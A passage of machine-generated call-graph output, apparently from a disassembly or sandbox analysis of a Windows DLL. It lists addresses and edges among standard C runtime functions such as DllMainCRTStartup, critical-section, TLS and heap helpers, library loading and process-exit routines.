6f95672a 8089->8091 8094 6f956a8e ___free_lconv_mon 12 API calls 8090->8094 8092 6f956745 8091->8092 8093 6f95672e 8091->8093 8110 6f956369 8092->8110 8096 6f9593f6 _unexpected 6 API calls 8093->8096 8094->8097 8096->8090 8097->8064 8099 6f956a8e ___free_lconv_mon 12 API calls 8099->8097 8115 6f9591f8 8100->8115 8102 6f9593d3 8103 6f9593dc 8102->8103 8104 6f9593ee TlsGetValue 8102->8104 8103->8082 8106 6f9591f8 _unexpected 5 API calls 8105->8106 8107 6f959412 8106->8107 8108 6f959430 TlsSetValue 8107->8108 8109 6f9566f0 8107->8109 8109->8084 8109->8097 8129 6f9561fd 8110->8129 8116 6f959228 8115->8116 8120 6f959224 _unexpected 8115->8120 8116->8120 8121 6f95912d 8116->8121 8119 6f959242 GetProcAddress 8119->8120 8120->8102 8127 6f95913e 8121->8127 8122 6f9591d4 8122->8119 8122->8120 8123 6f95915c LoadLibraryExW 8124 6f959177 GetLastError 8123->8124 8125 6f9591db 8123->8125 8124->8127 8125->8122 8126 6f9591ed FreeLibrary 8125->8126 8126->8122 8127->8122 8127->8123 8128 6f9591aa LoadLibraryExW 8127->8128 8128->8125 8128->8127 8130 6f956209 __FrameHandler3::FrameUnwindToState 8129->8130 8143 6f956933 EnterCriticalSection 8130->8143 8132 6f956213 8144 6f956243 8132->8144 8135 6f95630f 8136 6f95631b __FrameHandler3::FrameUnwindToState 8135->8136 8148 6f956933 EnterCriticalSection 8136->8148 8138 6f956325 8149 6f9564f0 8138->8149 8140 6f95633d 8153 6f95635d 8140->8153 8143->8132 8147 6f95697b LeaveCriticalSection 8144->8147 8146 6f956231 8146->8135 8147->8146 8148->8138 8150 6f956526 _unexpected 8149->8150 8151 6f9564ff _unexpected 8149->8151 8150->8140 8151->8150 8156 6f95a1ed 8151->8156 8266 6f95697b LeaveCriticalSection 8153->8266 8155 6f95634b 8155->8099 8157 6f95a26d 8156->8157 8160 6f95a203 8156->8160 8159 6f956a8e ___free_lconv_mon 14 API calls 8157->8159 8182 6f95a2bb 8157->8182 8161 6f95a28f 8159->8161 8160->8157 8165 6f956a8e ___free_lconv_mon 14 API calls 8160->8165 8176 6f95a236 8160->8176 8162 6f956a8e ___free_lconv_mon 14 API calls 8161->8162 8163 6f95a2a2 8162->8163 8166 6f956a8e ___free_lconv_mon 14 API calls 8163->8166 8164 6f956a8e ___free_lconv_mon 14 API calls 8168 6f95a262 8164->8168 8170 6f95a22b 8165->8170 8172 6f95a2b0 8166->8172 8167 6f956a8e ___free_lconv_mon 14 API calls 8173 6f95a24d 8167->8173 8174 6f956a8e ___free_lconv_mon 14 API calls 8168->8174 8169 6f95a329 8175 6f956a8e ___free_lconv_mon 14 API calls 8169->8175 8184 6f95a50a 8170->8184 8178 6f956a8e ___free_lconv_mon 14 API calls 8172->8178 8212 6f95a608 8173->8212 8174->8157 8180 6f95a32f 8175->8180 8176->8167 8183 6f95a258 8176->8183 8177 6f95a2c9 8177->8169 8181 6f956a8e 14 API calls ___free_lconv_mon 8177->8181 8178->8182 8180->8150 8181->8177 8224 6f95a35e 8182->8224 8183->8164 8185 6f95a51b 8184->8185 8211 6f95a604 8184->8211 8186 6f95a52c 8185->8186 8187 6f956a8e ___free_lconv_mon 14 API calls 8185->8187 8188 6f95a53e 8186->8188 8189 6f956a8e ___free_lconv_mon 14 API calls 8186->8189 8187->8186 8190 6f956a8e ___free_lconv_mon 14 API calls 8188->8190 8194 6f95a550 8188->8194 8189->8188 8190->8194 8191 6f956a8e ___free_lconv_mon 14 API calls 8193 6f95a562 8191->8193 8192 6f95a574 8196 6f95a586 8192->8196 8197 6f956a8e ___free_lconv_mon 14 API calls 8192->8197 8193->8192 8195 6f956a8e ___free_lconv_mon 14 API calls 8193->8195 8194->8191 8194->8193 8195->8192 8198 6f95a598 8196->8198 8200 6f956a8e ___free_lconv_mon 14 API calls 8196->8200 8197->8196 8199 6f95a5aa 8198->8199 8201 6f956a8e ___free_lconv_mon 14 API calls 8198->8201 8202 6f95a5bc 8199->8202 8203 6f956a8e ___free_lconv_mon 14 API calls 8199->8203 8200->8198 8201->8199 8204 6f95a5ce 8202->8204 8205 6f956a8e ___free_lconv_mon 14 API calls 8202->8205 8203->8202 8206 6f95a5e0 8204->8206 8208 6f956a8e ___free_lconv_mon 14 API calls 8204->8208 8205->8204 8207 6f95a5f2 8206->8207 8209 6f956a8e ___free_lconv_mon 14 API calls 8206->8209 8210 6f956a8e ___free_lconv_mon 14 API calls 8207->8210 8207->8211 8208->8206 8209->8207 8210->8211 8211->8176 8213 6f95a615 8212->8213 8214 6f95a66d 8212->8214 8215 6f95a625 8213->8215 8216 6f956a8e ___free_lconv_mon 14 API calls 8213->8216 8214->8183 8217 6f95a637 8215->8217 8218 6f956a8e ___free_lconv_mon 14 API calls 8215->8218 8216->8215 8219 6f95a649 8217->8219 8220 6f956a8e ___free_lconv_mon 14 API calls 8217->8220 8218->8217 8221 6f95a65b 8219->8221 8222 6f956a8e ___free_lconv_mon 14 API calls 8219->8222 8220->8219 8221->8214 8223 6f956a8e ___free_lconv_mon 14 API calls 8221->8223 8222->8221 8223->8214 8225 6f95a38a 8224->8225 8226 6f95a36b 8224->8226 8225->8177 8226->8225 8230 6f95a696 8226->8230 8229 6f956a8e ___free_lconv_mon 14 API calls 8229->8225 8231 6f95a384 8230->8231 8232 6f95a6a7 8230->8232 8231->8229 8233 6f95a671 _unexpected 14 API calls 8232->8233 8234 6f95a6af 8233->8234 8235 6f95a671 _unexpected 14 API calls 8234->8235 8236 6f95a6ba 8235->8236 8237 6f95a671 _unexpected 14 API calls 8236->8237 8238 6f95a6c5 8237->8238 8239 6f95a671 _unexpected 14 API calls 8238->8239 8240 6f95a6d0 8239->8240 8241 6f95a671 _unexpected 14 API calls 8240->8241 8242 6f95a6de 8241->8242 8243 6f956a8e ___free_lconv_mon 14 API calls 8242->8243 8244 6f95a6e9 8243->8244 8245 6f956a8e ___free_lconv_mon 14 API calls 8244->8245 8246 6f95a6f4 8245->8246 8247 6f956a8e ___free_lconv_mon 14 API calls 8246->8247 8248 6f95a6ff 8247->8248 8249 6f95a671 _unexpected 14 API calls 8248->8249 8250 6f95a70d 8249->8250 8251 6f95a671 _unexpected 14 API calls 8250->8251 8252 6f95a71b 8251->8252 8253 6f95a671 _unexpected 14 API calls 8252->8253 8254 6f95a72c 8253->8254 8255 6f95a671 _unexpected 14 API calls 8254->8255 8256 6f95a73a 8255->8256 8257 6f95a671 _unexpected 14 API calls 8256->8257 8258 6f95a748 8257->8258 8259 6f956a8e ___free_lconv_mon 14 API calls 8258->8259 8260 6f95a753 8259->8260 8261 6f956a8e ___free_lconv_mon 14 API calls 8260->8261 8262 6f95a75e 8261->8262 8263 6f956a8e ___free_lconv_mon 14 API calls 8262->8263 8264 6f95a769 8263->8264 8265 6f956a8e ___free_lconv_mon 14 API calls 8264->8265 8265->8231 8266->8155 8267->8076 8269 6f9576dd 8268->8269 8275 6f9576d6 8268->8275 8269->8275 8279 6f956567 GetLastError 8269->8279 8275->8058 8276 6f9592bd 8275->8276 8480 6f9590c5 8276->8480 8280 6f95657d 8279->8280 8284 6f956583 8279->8284 8282 6f9593b7 _unexpected 6 API calls 8280->8282 8281 6f9593f6 _unexpected 6 API calls 8283 6f95659f 8281->8283 8282->8284 8285 6f956587 SetLastError 8283->8285 8287 6f9578b8 _unexpected 14 API calls 8283->8287 8284->8281 8284->8285 8289 6f956617 8285->8289 8290 6f95661c 8285->8290 8288 6f9565b4 8287->8288 8291 6f9565cd 8288->8291 8292 6f9565bc 8288->8292 8306 6f959f58 8289->8306 8314 6f95609a 8290->8314 8295 6f9593f6 _unexpected 6 API calls 8291->8295 8294 6f9593f6 _unexpected 6 API calls 8292->8294 8297 6f9565ca 8294->8297 8298 6f9565d9 8295->8298 8301 6f956a8e ___free_lconv_mon 14 API calls 8297->8301 8299 6f9565f4 8298->8299 8300 6f9565dd 8298->8300 8302 6f956369 _unexpected 14 API calls 8299->8302 8303 6f9593f6 _unexpected 6 API calls 8300->8303 8301->8285 8304 6f9565ff 8302->8304 8303->8297 8305 6f956a8e ___free_lconv_mon 14 API calls 8304->8305 8305->8285 8307 6f957714 8306->8307 8308 6f959f6b 8306->8308 8310 6f959fb6 8307->8310 8308->8307 8437 6f95a439 8308->8437 8311 6f959fde 8310->8311 8312 6f959fc9 8310->8312 8311->8275 8312->8311 8459 6f95871f 8312->8459 8325 6f9598d3 8314->8325 8317 6f9560aa 8319 6f9560b4 IsProcessorFeaturePresent 8317->8319 8324 6f9560d3 8317->8324 8320 6f9560c0 8319->8320 8355 6f954d54 8320->8355 8361 6f95535e 8324->8361 8364 6f959801 8325->8364 8328 6f959918 8329 6f959924 __FrameHandler3::FrameUnwindToState 8328->8329 8330 6f9566b8 __dosmaperr 14 API calls 8329->8330 8331 6f959974 8329->8331 8334 6f959986 __FrameHandler3::FrameUnwindToState 8329->8334 8338 6f959955 __FrameHandler3::FrameUnwindToState 8329->8338 8330->8338 8332 6f956a7b __dosmaperr 14 API calls 8331->8332 8335 6f959979 8332->8335 8333 6f95995e 8333->8317 8336 6f9599bc __FrameHandler3::FrameUnwindToState 8334->8336 8375 6f956933 EnterCriticalSection 8334->8375 8339 6f954f50 ___std_exception_copy 39 API calls 8335->8339 8341 6f959af6 8336->8341 8342 6f9599f9 8336->8342 8352 6f959a27 8336->8352 8338->8331 8338->8333 8338->8334 8339->8333 8344 6f959b01 8341->8344 8380 6f95697b LeaveCriticalSection 8341->8380 8348 6f956567 _unexpected 39 API calls 8342->8348 8342->8352 8346 6f95535e __FrameHandler3::FrameUnwindToState 21 API calls 8344->8346 8347 6f959b09 8346->8347 8350 6f959a1c 8348->8350 8349 6f956567 _unexpected 39 API calls 8353 6f959a7c 8349->8353 8351 6f956567 _unexpected 39 API calls 8350->8351 8351->8352 8376 6f959aa2 8352->8376 8353->8333 8354 6f956567 _unexpected 39 API calls 8353->8354 8354->8333 8356 6f954d70 __FrameHandler3::FrameUnwindToState 8355->8356 8357 6f954d9c IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8356->8357 8360 6f954e6d __FrameHandler3::FrameUnwindToState 8357->8360 8358 6f951cf9 CatchGuardHandler 5 API calls 8359 6f954e8b 8358->8359 8359->8324 8360->8358 8382 6f95519b 8361->8382 8365 6f95980d __FrameHandler3::FrameUnwindToState 8364->8365 8370 6f956933 EnterCriticalSection 8365->8370 8367 6f95981b 8371 6f95985d 8367->8371 8370->8367 8374 6f95697b LeaveCriticalSection 8371->8374 8373 6f95609f 8373->8317 8373->8328 8374->8373 8375->8336 8377 6f959aa6 8376->8377 8379 6f959a6e 8376->8379 8381 6f95697b LeaveCriticalSection 8377->8381 8379->8333 8379->8349 8379->8353 8380->8344 8381->8379 8383 6f9551c8 8382->8383 8384 6f9551da 8382->8384 8409 6f955263 GetModuleHandleW 8383->8409 8394 6f95504b 8384->8394 8389 6f955217 8393 6f95522c 8395 6f955057 __FrameHandler3::FrameUnwindToState 8394->8395 8417 6f956933 EnterCriticalSection 8395->8417 8397 6f955061 8418 6f9550b3 8397->8418 8399 6f95506e 8422 6f95508c 8399->8422 8402 6f955232 8430 6f9552a5 8402->8430 8404 6f95523c 8405 6f955250 8404->8405 8406 6f955240 GetCurrentProcess TerminateProcess 8404->8406 8407 6f9552be __FrameHandler3::FrameUnwindToState 3 API calls 8405->8407 8406->8405 8408 6f955258 ExitProcess 8407->8408 8410 6f9551cd 8409->8410 8410->8384 8411 6f9552be GetModuleHandleExW 8410->8411 8412 6f9552fd GetProcAddress 8411->8412 8413 6f95531e 8411->8413 8412->8413 8414 6f955311 8412->8414 8415 6f955324 FreeLibrary 8413->8415 8416 6f9551d9 8413->8416 8414->8413 8415->8416 8416->8384 8417->8397 8419 6f9550bf __FrameHandler3::FrameUnwindToState 8418->8419 8421 6f955123 __FrameHandler3::FrameUnwindToState 8419->8421 8425 6f955e19 8419->8425 8421->8399 8429 6f95697b LeaveCriticalSection 8422->8429 8424 6f95507a 8424->8389 8424->8402 8426 6f955e25 __EH_prolog3 8425->8426 8427 6f955ce4 __DllMainCRTStartup@12 14 API calls 8426->8427 8428 6f955e4c __DllMainCRTStartup@12 8427->8428 8428->8421 8429->8424 8433 6f9569b7 8430->8433 8432 6f9552aa __FrameHandler3::FrameUnwindToState 8432->8404 8434 6f9569c6 __FrameHandler3::FrameUnwindToState 8433->8434 8435 6f9569d3 8434->8435 8436 6f95927d __FrameHandler3::FrameUnwindToState 5 API calls 8434->8436 8435->8432 8436->8435 8438 6f95a445 __FrameHandler3::FrameUnwindToState 8437->8438 8439 6f956567 _unexpected 39 API calls 8438->8439 8440 6f95a44e 8439->8440 8441 6f95a494 8440->8441 8450 6f956933 EnterCriticalSection 8440->8450 8441->8307 8443 6f95a46c 8451 6f95a4ba 8443->8451 8448 6f95609a __FrameHandler3::FrameUnwindToState 39 API calls 8449 6f95a4b9 8448->8449 8450->8443 8452 6f95a4c8 _unexpected 8451->8452 8454 6f95a47d 8451->8454 8453 6f95a1ed _unexpected 14 API calls 8452->8453 8452->8454 8453->8454 8455 6f95a499 8454->8455 8458 6f95697b LeaveCriticalSection 8455->8458 8457 6f95a490 8457->8441 8457->8448 8458->8457 8460 6f956567 _unexpected 39 API calls 8459->8460 8461 6f958724 8460->8461 8464 6f958637 8461->8464 8465 6f958643 __FrameHandler3::FrameUnwindToState 8464->8465 8466 6f95865d 8465->8466 8475 6f956933 EnterCriticalSection 8465->8475 8469 6f958664 8466->8469 8471 6f95609a __FrameHandler3::FrameUnwindToState 39 API calls 8466->8471 8468 6f958699 8476 6f9586b6 8468->8476 8469->8311 8473 6f9586d6 8471->8473 8472 6f95866d 8472->8468 8474 6f956a8e ___free_lconv_mon 14 API calls 8472->8474 8474->8468 8475->8472 8479 6f95697b LeaveCriticalSection 8476->8479 8478 6f9586bd 8478->8466 8479->8478 8481 6f9591f8 _unexpected 5 API calls 8480->8481 8482 6f9590db 8481->8482 8482->8058 8484 6f9575fe 8483->8484 8485 6f957618 8483->8485 8501 6f957780 8484->8501 8487 6f95763e 8485->8487 8489 6f95761f 8485->8489 8510 6f958ad1 8487->8510 8493 6f957608 8489->8493 8505 6f95779a 8489->8505 8490 6f95764d 8492 6f957654 GetLastError 8490->8492 8495 6f95767a 8490->8495 8497 6f95779a 15 API calls 8490->8497 8494 6f956a21 __dosmaperr 14 API calls 8492->8494 8493->7920 8493->7921 8496 6f957660 8494->8496 8495->8493 8498 6f958ad1 ___scrt_uninitialize_crt MultiByteToWideChar 8495->8498 8499 6f956a7b __dosmaperr 14 API calls 8496->8499 8497->8495 8500 6f957691 8498->8500 8499->8493 8500->8492 8500->8493 8502 6f957793 8501->8502 8503 6f95778b 8501->8503 8502->8493 8504 6f956a8e ___free_lconv_mon 14 API calls 8503->8504 8504->8502 8506 6f957780 14 API calls 8505->8506 8507 6f9577a8 8506->8507 8513 6f9577d9 8507->8513 8537 6f958a39 8510->8537 8516 6f95786a 8513->8516 8517 6f9578a8 8516->8517 8522 6f957878 _unexpected 8516->8522 8518 6f956a7b __dosmaperr 14 API calls 8517->8518 8520 6f9577b9 8518->8520 8519 6f957893 HeapAlloc 8519->8520 8519->8522 8520->8493 8522->8517 8522->8519 8523 6f9554c6 8522->8523 8526 6f9554f2 8523->8526 8527 6f9554fe __FrameHandler3::FrameUnwindToState 8526->8527 8532 6f956933 EnterCriticalSection 8527->8532 8529 6f955509 __FrameHandler3::FrameUnwindToState 8533 6f955540 8529->8533 8532->8529 8536 6f95697b LeaveCriticalSection 8533->8536 8535 6f9554d1 8535->8522 8536->8535 8538 6f958a4a MultiByteToWideChar 8537->8538 8538->8490 8563 6f956c5b 8539->8563 8543 6f957741 39 API calls 8542->8543 8544 6f95ae5d 8543->8544 8545 6f9576a2 17 API calls 8544->8545 8546 6f95ae6a 8545->8546 8547 6f95aed1 8546->8547 8548 6f957741 39 API calls 8546->8548 8549 6f95aedd 8547->8549 8552 6f956a8e ___free_lconv_mon 14 API calls 8547->8552 8550 6f95ae76 8548->8550 8551 6f95aeec 8549->8551 8554 6f956a8e ___free_lconv_mon 14 API calls 8549->8554 8553 6f9576a2 17 API calls 8550->8553 8555 6f956fbd 8551->8555 8557 6f956a8e ___free_lconv_mon 14 API calls 8551->8557 8552->8549 8556 6f95ae83 8553->8556 8554->8551 8555->7953 8555->7954 8555->7955 8556->8547 8558 6f95aead CreateProcessW 8556->8558 8559 6f957741 39 API calls 8556->8559 8557->8555 8558->8547 8560 6f95ae94 8559->8560 8561 6f9576a2 17 API calls 8560->8561 8562 6f95aea1 8561->8562 8562->8547 8562->8558 8564 6f956c67 __FrameHandler3::FrameUnwindToState 8563->8564 8571 6f956933 EnterCriticalSection 8564->8571 8566 6f956c75 8572 6f9570b7 8566->8572 8571->8566 8573 6f9570e0 8572->8573 8574 6f95710c 8573->8574 8575 6f95711e 8573->8575 8577 6f956a7b __dosmaperr 14 API calls 8574->8577 8576 6f9578b8 _unexpected 14 API calls 8575->8576 8579 6f957132 8576->8579 8578 6f956c82 8577->8578 8583 6f956caa 8578->8583 8580 6f956a7b __dosmaperr 14 API calls 8579->8580 8581 6f957140 8579->8581 8580->8581 8582 6f956a8e ___free_lconv_mon 14 API calls 8581->8582 8582->8578 8586 6f95697b LeaveCriticalSection 8583->8586 8585 6f956c93 8585->7940 8585->7941 8586->8585 8588 6f954eae ___std_exception_copy 8587->8588 8593 6f954ed3 8588->8593 8594 6f954ee3 8593->8594 8596 6f954eea 8593->8596 8608 6f954cf1 GetLastError 8594->8608 8600 6f954ec6 8596->8600 8612 6f954cc8 8596->8612 8598 6f954f1f 8599 6f954f7d _Deallocate 11 API calls 8598->8599 8598->8600 8601 6f954f4f 8599->8601 8602 6f954c8c 8600->8602 8603 6f954c98 8602->8603 8605 6f954caf 8603->8605 8637 6f954d37 8603->8637 8606 6f954d37 ___std_exception_copy 39 API calls 8605->8606 8607 6f954cc2 8605->8607 8606->8607 8607->7869 8609 6f954d0a 8608->8609 8615 6f956769 8609->8615 8613 6f954cd3 GetLastError SetLastError 8612->8613 8614 6f954cec 8612->8614 8613->8598 8614->8598 8616 6f956782 8615->8616 8617 6f95677c 8615->8617 8618 6f9593f6 _unexpected 6 API calls 8616->8618 8623 6f954d22 SetLastError 8616->8623 8619 6f9593b7 _unexpected 6 API calls 8617->8619 8620 6f95679c 8618->8620 8619->8616 8621 6f9578b8 _unexpected 14 API calls 8620->8621 8620->8623 8622 6f9567ac 8621->8622 8624 6f9567b4 8622->8624 8625 6f9567c9 8622->8625 8623->8596 8626 6f9593f6 _unexpected 6 API calls 8624->8626 8627 6f9593f6 _unexpected 6 API calls 8625->8627 8628 6f9567c0 8626->8628 8629 6f9567d5 8627->8629 8633 6f956a8e ___free_lconv_mon 14 API calls 8628->8633 8630 6f9567d9 8629->8630 8631 6f9567e8 8629->8631 8634 6f9593f6 _unexpected 6 API calls 8630->8634 8632 6f956369 _unexpected 14 API calls 8631->8632 8635 6f9567f3 8632->8635 8633->8623 8634->8628 8636 6f956a8e ___free_lconv_mon 14 API calls 8635->8636 8636->8623 8638 6f954d41 8637->8638 8639 6f954d4a 8637->8639 8640 6f954cf1 ___std_exception_copy 16 API calls 8638->8640 8639->8605 8641 6f954d46 8640->8641 8641->8639 8642 6f95609a __FrameHandler3::FrameUnwindToState 39 API calls 8641->8642 8643 6f954d53 8642->8643 8877 6f951d2a 8878 6f951d35 8877->8878 8879 6f951d68 8877->8879 8881 6f951d5a 8878->8881 8882 6f951d3a 8878->8882 8916 6f951e84 8879->8916 8889 6f951d7d 8881->8889 8883 6f951d50 8882->8883 8884 6f951d3f 8882->8884 8908 6f95237c 8883->8908 8888 6f951d44 8884->8888 8903 6f95239b 8884->8903 8890 6f951d89 __FrameHandler3::FrameUnwindToState 8889->8890 8939 6f95240c 8890->8939 8892 6f951d90 __DllMainCRTStartup@12 8893 6f951db7 8892->8893 8894 6f951e7c 8892->8894 8900 6f951df3 ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState 8892->8900 8950 6f95236e 8893->8950 8958 6f9525ab IsProcessorFeaturePresent 8894->8958 8897 6f951e83 8898 6f951dc6 __RTC_Initialize 8898->8900 8953 6f95228c InitializeSListHead 8898->8953 8900->8888 8901 6f951dd4 8901->8900 8954 6f952343 8901->8954 9105 6f955fba 8903->9105 9194 6f9531ec 8908->9194 8911 6f952385 8911->8888 8914 6f952398 8914->8888 8915 6f9531f7 21 API calls 8915->8911 8918 6f951e90 __FrameHandler3::FrameUnwindToState __DllMainCRTStartup@12 8916->8918 8917 6f951e99 8917->8888 8918->8917 8919 6f951ec1 8918->8919 8920 6f951f2c 8918->8920 9214 6f9523dc 8919->9214 8921 6f9525ab __DllMainCRTStartup@12 4 API calls 8920->8921 8925 6f951f33 __FrameHandler3::FrameUnwindToState 8921->8925 8923 6f951ec6 9223 6f952298 8923->9223 8926 6f951f69 dllmain_raw 8925->8926 8935 6f951f64 __DllMainCRTStartup@12 8925->8935 8936 6f951f4f 8925->8936 8928 6f951f83 dllmain_crt_dispatch 8926->8928 8926->8936 8927 6f951ecb __RTC_Initialize __DllMainCRTStartup@12 9226 6f95257d 8927->9226 8928->8935 8928->8936 8932 6f951fd5 8933 6f951fde dllmain_crt_dispatch 8932->8933 8932->8936 8934 6f951ff1 dllmain_raw 8933->8934 8933->8936 8934->8936 8935->8932 8937 6f951e84 __DllMainCRTStartup@12 81 API calls 8935->8937 8936->8888 8938 6f951fca dllmain_raw 8937->8938 8938->8932 8940 6f952415 8939->8940 8962 6f952778 IsProcessorFeaturePresent 8940->8962 8944 6f952426 8945 6f95242a 8944->8945 8972 6f955f9d 8944->8972 8945->8892 8948 6f952441 8948->8892 9099 6f952445 8950->9099 8952 6f952375 8952->8898 8953->8901 8955 6f952348 ___scrt_release_startup_lock 8954->8955 8956 6f952778 IsProcessorFeaturePresent 8955->8956 8957 6f952351 8955->8957 8956->8957 8957->8900 8959 6f9525c1 __FrameHandler3::FrameUnwindToState 8958->8959 8960 6f95266c IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8959->8960 8961 6f9526b7 __FrameHandler3::FrameUnwindToState 8960->8961 8961->8897 8963 6f952421 8962->8963 8964 6f9531cd 8963->8964 8981 6f953807 8964->8981 8968 6f9531de 8969 6f9531e9 8968->8969 8995 6f953843 8968->8995 8969->8944 8971 6f9531d6 8971->8944 9037 6f959768 8972->9037 8975 6f953202 8976 6f953215 8975->8976 8977 6f95320b 8975->8977 8976->8945 8978 6f9537ec ___vcrt_uninitialize_ptd 6 API calls 8977->8978 8979 6f953210 8978->8979 8980 6f953843 ___vcrt_uninitialize_locks DeleteCriticalSection 8979->8980 8980->8976 8982 6f953810 8981->8982 8984 6f953839 8982->8984 8985 6f9531d2 8982->8985 8999 6f953e3b 8982->8999 8986 6f953843 ___vcrt_uninitialize_locks DeleteCriticalSection 8984->8986 8985->8971 8987 6f9537b9 8985->8987 8986->8985 9018 6f953d4c 8987->9018 8990 6f9537ce 8990->8968 8993 6f9537e9 8993->8968 8996 6f95384e 8995->8996 8998 6f95386d 8995->8998 8997 6f953858 DeleteCriticalSection 8996->8997 8997->8997 8997->8998 8998->8971 9004 6f953d03 8999->9004 9002 6f953e73 InitializeCriticalSectionAndSpinCount 9003 6f953e5e 9002->9003 9003->8982 9005 6f953d3e 9004->9005 9006 6f953d1b 9004->9006 9005->9002 9005->9003 9006->9005 9010 6f953c69 9006->9010 9009 6f953d30 GetProcAddress 9009->9005 9011 6f953c75 9010->9011 9012 6f953ce9 9011->9012 9013 6f953c8b LoadLibraryExW 9011->9013 9017 6f953ccb LoadLibraryExW 9011->9017 9012->9005 9012->9009 9014 6f953cf0 9013->9014 9015 6f953ca9 GetLastError 9013->9015 9014->9012 9016 6f953cf8 FreeLibrary 9014->9016 9015->9011 9016->9012 9017->9011 9017->9014 9019 6f953d03 ___vcrt_FlsSetValue 5 API calls 9018->9019 9020 6f953d66 9019->9020 9021 6f953d7f TlsAlloc 9020->9021 9022 6f9537c3 9020->9022 9022->8990 9023 6f953dfd 9022->9023 9024 6f953d03 ___vcrt_FlsSetValue 5 API calls 9023->9024 9025 6f953e17 9024->9025 9026 6f953e32 TlsSetValue 9025->9026 9027 6f9537dc 9025->9027 9026->9027 9027->8993 9028 6f9537ec 9027->9028 9029 6f9537fc 9028->9029 9030 6f9537f6 9028->9030 9029->8990 9032 6f953d87 9030->9032 9033 6f953d03 ___vcrt_FlsSetValue 5 API calls 9032->9033 9034 6f953da1 9033->9034 9035 6f953dad 9034->9035 9036 6f953db9 TlsFree 9034->9036 9035->9029 9036->9035 9038 6f959778 9037->9038 9039 6f952433 9037->9039 9038->9039 9041 6f9596dc 9038->9041 9039->8948 9039->8975 9042 6f9596e8 __FrameHandler3::FrameUnwindToState 9041->9042 9053 6f956933 EnterCriticalSection 9042->9053 9044 6f9596ef 9054 6f95baf8 9044->9054 9047 6f95970d 9078 6f959733 9047->9078 9053->9044 9055 6f95bb04 __FrameHandler3::FrameUnwindToState 9054->9055 9056 6f95bb0d 9055->9056 9057 6f95bb2e 9055->9057 9058 6f956a7b __dosmaperr 14 API calls 9056->9058 9081 6f956933 EnterCriticalSection 9057->9081 9060 6f95bb12 9058->9060 9061 6f954f50 ___std_exception_copy 39 API calls 9060->9061 9062 6f9596fe 9061->9062 9062->9047 9067 6f959576 GetStartupInfoW 9062->9067 9063 6f95bb66 9089 6f95bb8d 9063->9089 9064 6f95bb3a 9064->9063 9082 6f95ba48 9064->9082 9068 6f959593 9067->9068 9070 6f959627 9067->9070 9069 6f95baf8 40 API calls 9068->9069 9068->9070 9071 6f9595bb 9069->9071 9073 6f95962c 9070->9073 9071->9070 9072 6f9595eb GetFileType 9071->9072 9072->9071 9074 6f959633 9073->9074 9075 6f959676 GetStdHandle 9074->9075 9076 6f9596d8 9074->9076 9077 6f959689 GetFileType 9074->9077 9075->9074 9076->9047 9077->9074 9098 6f95697b LeaveCriticalSection 9078->9098 9080 6f95971e 9080->9038 9081->9064 9083 6f9578b8 _unexpected 14 API calls 9082->9083 9086 6f95ba5a 9083->9086 9084 6f95ba67 9085 6f956a8e ___free_lconv_mon 14 API calls 9084->9085 9088 6f95babc 9085->9088 9086->9084 9092 6f959438 9086->9092 9088->9064 9097 6f95697b LeaveCriticalSection 9089->9097 9091 6f95bb94 9091->9062 9093 6f9591f8 _unexpected 5 API calls 9092->9093 9094 6f959454 9093->9094 9095 6f959472 InitializeCriticalSectionAndSpinCount 9094->9095 9096 6f95945d 9094->9096 9095->9096 9096->9086 9097->9091 9098->9080 9100 6f952451 9099->9100 9101 6f952455 9099->9101 9100->8952 9102 6f9525ab __DllMainCRTStartup@12 4 API calls 9101->9102 9104 6f952462 ___scrt_release_startup_lock 9101->9104 9103 6f9524cb 9102->9103 9104->8952 9111 6f95653b 9105->9111 9108 6f9531f7 9177 6f9536e3 9108->9177 9112 6f956545 9111->9112 9113 6f9523a0 9111->9113 9114 6f9593b7 _unexpected 6 API calls 9112->9114 9113->9108 9115 6f95654c 9114->9115 9115->9113 9116 6f9593f6 _unexpected 6 API calls 9115->9116 9117 6f95655f 9116->9117 9119 6f956402 9117->9119 9120 6f95640d 9119->9120 9121 6f95641d 9119->9121 9125 6f956423 9120->9125 9121->9113 9124 6f956a8e ___free_lconv_mon 14 API calls 9124->9121 9126 6f95643e 9125->9126 9127 6f956438 9125->9127 9129 6f956a8e ___free_lconv_mon 14 API calls 9126->9129 9128 6f956a8e ___free_lconv_mon 14 API calls 9127->9128 9128->9126 9130 6f95644a 9129->9130 9131 6f956a8e ___free_lconv_mon 14 API calls 9130->9131 9132 6f956455 9131->9132 9133 6f956a8e ___free_lconv_mon 14 API calls 9132->9133 9134 6f956460 9133->9134 9135 6f956a8e ___free_lconv_mon 14 API calls 9134->9135 9136 6f95646b 9135->9136 9137 6f956a8e ___free_lconv_mon 14 API calls 9136->9137 9138 6f956476 9137->9138 9139 6f956a8e ___free_lconv_mon 14 API calls 9138->9139 9140 6f956481 9139->9140 9141 6f956a8e ___free_lconv_mon 14 API calls 9140->9141 9142 6f95648c 9141->9142 9143 6f956a8e ___free_lconv_mon 14 API calls 9142->9143 9144 6f956497 9143->9144 9145 6f956a8e ___free_lconv_mon 14 API calls 9144->9145 9146 6f9564a5 9145->9146 9151 6f95624f 9146->9151 9152 6f95625b __FrameHandler3::FrameUnwindToState 9151->9152 9167 6f956933 EnterCriticalSection 9152->9167 9154 6f95628f 9168 6f9562ae 9154->9168 9156 6f956265 9156->9154 9158 6f956a8e ___free_lconv_mon 14 API calls 9156->9158 9158->9154 9159 6f9562ba 9160 6f9562c6 __FrameHandler3::FrameUnwindToState 9159->9160 9172 6f956933 EnterCriticalSection 9160->9172 9162 6f9562d0 9163 6f9564f0 _unexpected 14 API calls 9162->9163 9164 6f9562e3 9163->9164 9173 6f956303 9164->9173 9167->9156 9171 6f95697b LeaveCriticalSection 9168->9171 9170 6f95629c 9170->9159 9171->9170 9172->9162 9176 6f95697b LeaveCriticalSection 9173->9176 9175 6f9562f1 9175->9124 9176->9175 9178 6f9536f0 9177->9178 9184 6f9523a5 9177->9184 9179 6f9536fe 9178->9179 9185 6f953dc2 9178->9185 9180 6f953dfd ___vcrt_FlsSetValue 6 API calls 9179->9180 9182 6f95370e 9180->9182 9190 6f9536c7 9182->9190 9184->8888 9186 6f953d03 ___vcrt_FlsSetValue 5 API calls 9185->9186 9187 6f953ddc 9186->9187 9188 6f953df4 TlsGetValue 9187->9188 9189 6f953de8 9187->9189 9188->9189 9189->9179 9191 6f9536d1 9190->9191 9192 6f9536de 9190->9192 9191->9192 9193 6f9555ad ___std_exception_copy 